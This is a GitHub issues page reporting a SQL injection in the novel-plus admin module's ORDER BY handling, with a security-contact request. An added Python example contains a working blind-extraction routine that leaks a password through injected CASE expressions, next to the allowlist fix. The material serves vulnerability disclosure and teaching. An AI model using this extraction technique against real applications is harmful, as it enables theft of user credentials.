Issues opened by haby0 (2 results)
The novel-admin submodule has a SQL injection risk. User request: https://github.com/201206030/novel-plus/blob/4540c3781e9bc1d47c388cb8b6058ed66e094586/novel-admin/src/main/java/com/java2nb/novel/controller/BookController.java#L49 Database query: https://github.com/201206030/novel-plus/blob/4540c3781e9bc1d47c388cb8b6058ed66e094586/novel-admin/src/main/resources/mybatis/novel/BookMapper.xml#L48 The user can control the `sort` and `order` variables; when MyBatis uses `$`, the user input is concatenated into the SQL statement, which leads to a SQL injection attack.
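Added example (not code from the novel-plus project or from the issue author): the pattern reported above is an ORDER BY built from user-controlled `sort`/`order` values, which MyBatis `${...}` pastes into the SQL text verbatim. The example below reproduces that shape in Python with an in-memory sqlite3 database standing in for MyBatis/MySQL, with constructed `book` and `user` tables and hypothetical function names. It shows three things: how an attacker who only sees the row order can still extract data through a `CASE` expression in ORDER BY, why switching the placeholder to `#{}` (a bound parameter) is not a fix for identifiers, and the allowlist check that is.

```python
import sqlite3

# Only these values may ever reach the ORDER BY clause (assumed column set).
ALLOWED_SORT = {"id", "book_name"}
ALLOWED_ORDER = {"asc", "desc"}


def make_db():
    """Constructed sample data: a book table to sort and a user table to steal from."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE book (id INTEGER, book_name TEXT)")
    # Inserted deliberately so that id-order and name-order differ.
    conn.executemany("INSERT INTO book VALUES (?, ?)",
                     [(3, "Alpha"), (1, "Zeta"), (2, "Mid")])
    conn.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO user VALUES (1, 'admin', 'secret')")
    return conn


def list_books_vulnerable(conn, sort, order):
    """Equivalent of MyBatis 'ORDER BY ${sort} ${order}': raw string concatenation."""
    sql = f"SELECT id, book_name FROM book ORDER BY {sort} {order}"
    return conn.execute(sql).fetchall()


def list_books_bound(conn, sort):
    """Equivalent of 'ORDER BY #{sort}': the value is bound, so it becomes a string
    constant and sorts nothing. Safe from injection, but functionally broken."""
    return conn.execute("SELECT id, book_name FROM book ORDER BY ?", (sort,)).fetchall()


def list_books_safe(conn, sort, order):
    """Allowlist the identifier and direction first; only then interpolate them."""
    if sort not in ALLOWED_SORT or order.lower() not in ALLOWED_ORDER:
        raise ValueError("invalid sort parameter")
    sql = f"SELECT id, book_name FROM book ORDER BY {sort} {order}"
    return conn.execute(sql).fetchall()


def recover_admin_password(conn, alphabet="abcdefghijklmnopqrstuvwxyz", max_len=32):
    """Blind extraction through the vulnerable endpoint. The attacker never sees the
    user table; it only observes whether the rows came back in id order or name order."""
    id_order = list_books_vulnerable(conn, "id", "asc")
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = ("(CASE WHEN (SELECT substr(password,%d,1) FROM user "
                     "WHERE username='admin')='%s' THEN id ELSE book_name END)" % (pos, ch))
            if list_books_vulnerable(conn, probe, "asc") == id_order:
                recovered += ch
                break
        else:
            # No candidate matched: we ran past the end of the password.
            return recovered
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", recover_admin_password(db))
    print("bound placeholder result:", list_books_bound(db, "id"))
    print("allowlisted result:", list_books_safe(db, "id", "asc"))
```

In the MyBatis case the same fix applies at the Java layer: validate `sort` against the set of sortable column names and `order` against `asc`/`desc` before the values reach the mapper, and keep `${}` only for those validated identifiers. Binding them with `#{}` quietly disables sorting rather than securing it.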
What would be the right contact to report a security vulnerability? Thanks!